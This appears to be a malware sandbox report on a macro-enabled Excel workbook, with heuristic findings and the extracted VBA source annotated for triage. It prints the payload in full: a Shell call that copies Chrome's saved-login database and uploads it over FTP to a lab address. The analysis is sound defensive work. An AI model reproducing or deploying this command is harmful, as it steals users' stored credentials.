MALICIOUS
180
Risk Score
Heuristics 4
-
VBA project inside OOXML — medium — 3 related findings — OOXML_VBA: Document contains a VBA project — VBA macros present
-
Potential Shell call in VBA — critical — OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
strOutput = Shell("cmd.exe /C Powershell Copy-Item -Path """"""$env:LocalAppData\Google\Chrome\User Data\Default\Login Data"""""" -Destination $env:tmp\chromeLoginData; (New-Object System.Net.WebClient).UploadFile('ftp://anonymous:@192.168.56.102/data/logindata', """"""$env:tmp\chromeLoginData"""""")") -
PowerShell reference in VBA — critical — OLE_VBA_PS: PowerShell reference in VBA. Matched line in script:
ActiveCell.FormulaR1C1 = " strCommand = ""Powershell Echo Hello World""" -
cmd.exe reference in VBA — high — OLE_VBA_CMD: cmd.exe reference in VBA. Matched line in script:
strOutput = Shell("cmd.exe /C Powershell Copy-Item -Path """"""$env:LocalAppData\Google\Chrome\User Data\Default\Login Data"""""" -Destination $env:tmp\chromeLoginData; (New-Object System.Net.WebClient).UploadFile('ftp://anonymous:@192.168.56.102/data/logindata', """"""$env:tmp\chromeLoginData"""""")")
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: a4c65dc7d678e6d84d675932f80ab789c438423b48dd1c10d465138398484243) | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3427 bytes |
Preview script — first 1,000 lines of the extracted script:
Attribute VB_Name = "Modul1"
' The extractor (oletools.olevba) emits every module of the VBA project
' into this one listing; each "Attribute VB_Name" line starts a new
' module. Modul1 contains only the recorded macro test1 below.
Sub test1()
Attribute test1.VB_ProcData.VB_Invoke_Func = " \n14"
' test1 is an Excel-recorded macro ("Makro" = German-locale recorder
' comment): the body is replayed UI activity (scrolling, cell selection,
' one paste) followed by a SaveAs. It does not call Shell and does not
' reference RunAndGetCmd. The VB_Invoke_Func attribute above stores the
' shortcut-key binding assigned at record time (value not decoded here).
'
' test1 Makro
'
'
' Recorded scroll/selection noise; nothing is read or written here.
ActiveWindow.SmallScroll Down:=12
Range("A16").Select
ActiveWindow.SmallScroll Down:=27
ActiveWindow.ScrollRow = 42
ActiveWindow.ScrollRow = 41
ActiveWindow.ScrollRow = 40
ActiveWindow.ScrollRow = 39
ActiveWindow.ScrollRow = 38
ActiveWindow.ScrollRow = 36
ActiveWindow.ScrollRow = 34
ActiveWindow.ScrollRow = 32
ActiveWindow.ScrollRow = 30
ActiveWindow.ScrollRow = 27
ActiveWindow.ScrollRow = 25
ActiveWindow.ScrollRow = 23
ActiveWindow.ScrollRow = 21
ActiveWindow.ScrollRow = 19
ActiveWindow.ScrollRow = 16
ActiveWindow.ScrollRow = 14
ActiveWindow.ScrollRow = 13
ActiveWindow.ScrollRow = 11
ActiveWindow.ScrollRow = 8
ActiveWindow.ScrollRow = 6
ActiveWindow.ScrollRow = 5
ActiveWindow.ScrollRow = 3
ActiveWindow.ScrollRow = 2
ActiveWindow.ScrollRow = 1
Range("A1").Select
' Pastes whatever was on the clipboard when the macro was recorded into
' A1 — that content is not part of this listing and cannot be assessed here.
ActiveSheet.Paste
ActiveWindow.SmallScroll Down:=6
ActiveWindow.ScrollRow = 24
ActiveWindow.ScrollRow = 23
ActiveWindow.ScrollRow = 22
ActiveWindow.ScrollRow = 21
ActiveWindow.ScrollRow = 20
ActiveWindow.ScrollRow = 19
ActiveWindow.ScrollRow = 18
ActiveWindow.ScrollRow = 17
ActiveWindow.ScrollRow = 16
ActiveWindow.ScrollRow = 15
ActiveWindow.ScrollRow = 14
ActiveWindow.ScrollRow = 12
ActiveWindow.ScrollRow = 11
ActiveWindow.ScrollRow = 10
ActiveWindow.ScrollRow = 9
ActiveWindow.ScrollRow = 8
ActiveWindow.ScrollRow = 7
ActiveWindow.ScrollRow = 6
ActiveWindow.ScrollRow = 5
ActiveWindow.ScrollRow = 4
ActiveWindow.ScrollRow = 3
ActiveWindow.ScrollRow = 2
ActiveWindow.ScrollRow = 1
Range("A2").Select
ActiveCell.FormulaR1C1 = ""
Range("A3").Select
' Writes a literal string into cell A3. The "Powershell ..." text is cell
' content, not executed code; this is the line the OLE_VBA_PS heuristic
' matched, so that finding alone is not evidence of execution.
ActiveCell.FormulaR1C1 = " strCommand = ""Powershell Echo Hello World"""
Range("A6").Select
' Author-environment artifact captured by the recorder: a user-profile
' name and a save path. Useful as a pivot/attribution indicator only.
ChDir "C:\Users\Kassandra\Desktop"
ActiveWorkbook.SaveAs Filename:="C:\Users\Kassandra\Desktop\test1.xlsm", _
FileFormat:=xlOpenXMLWorkbookMacroEnabled, CreateBackup:=False
Range("C7").Select
End Sub
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Document-class module ("DieseArbeitsmappe" is the German-locale name of
' ThisWorkbook): header attributes only, no procedures. In particular no
' Workbook_Open handler is present, so this module does not start
' anything automatically.
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Document-class module ("Tabelle1", presumably Sheet1): again header only,
' no code. Its VB_Base GUID differs from the workbook module's — presumably
' the Worksheet vs Workbook class ids; not needed for triage.
Attribute VB_Name = "Modul2"
' Standard module Modul2 — holds the payload function RunAndGetCmd.
Function RunAndGetCmd()
' The sample's actual payload: a single-call credential-theft and
' exfiltration routine. Everything happens inside one Shell() string,
' giving the process chain EXCEL -> cmd.exe /C -> powershell.exe, which
'   1. copies Chrome's saved-logins database ("Login Data" under
'      %LOCALAPPDATA%) to %TMP%\chromeLoginData, then
'   2. uploads that copy with System.Net.WebClient.UploadFile to an FTP
'      server (anonymous login) at 192.168.56.102. That is a private
'      address (commonly the VirtualBox host-only default range), which
'      is consistent with a lab/test build rather than a live C2 — verify
'      before treating the destination as an external indicator.
' Detection value: the cmd.exe -> powershell.exe child of EXCEL.EXE, the
' literal command string below (what OLE_VBA_SHELL / OLE_VBA_CMD matched),
' and the FTP destination are the actionable indicators.
' Reader notes:
'  - strOutput is never declared (no Option Explicit in the preview) and
'    the function never assigns its own return value, so the "GetCmd" in
'    the name is not honoured. Nothing in this listing calls RunAndGetCmd
'    and no Workbook_Open/Auto_Open trigger is visible; confirm against
'    the full artifact before concluding it runs only on manual invocation.
'  - The commented-out line below is an earlier variant: same copy step,
'    "cmd" instead of "cmd.exe", and no upload.
'strOutput = Shell("cmd /C Powershell Copy-Item -Path """"""$env:LocalAppData\Google\Chrome\User Data\Default\Login Data"""""" -Destination $env:tmp\chromeLoginData")
strOutput = Shell("cmd.exe /C Powershell Copy-Item -Path """"""$env:LocalAppData\Google\Chrome\User Data\Default\Login Data"""""" -Destination $env:tmp\chromeLoginData; (New-Object System.Net.WebClient).UploadFile('ftp://anonymous:@192.168.56.102/data/logindata', """"""$env:tmp\chromeLoginData"""""")")
End Function
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin (SHA-256: 704da8686bef806aa2f2480144129525f5bdaf48ab2d2632f68c0ffcdcac693b) | vba-project | OOXML VBA project: xl/vbaProject.bin | 34304 bytes |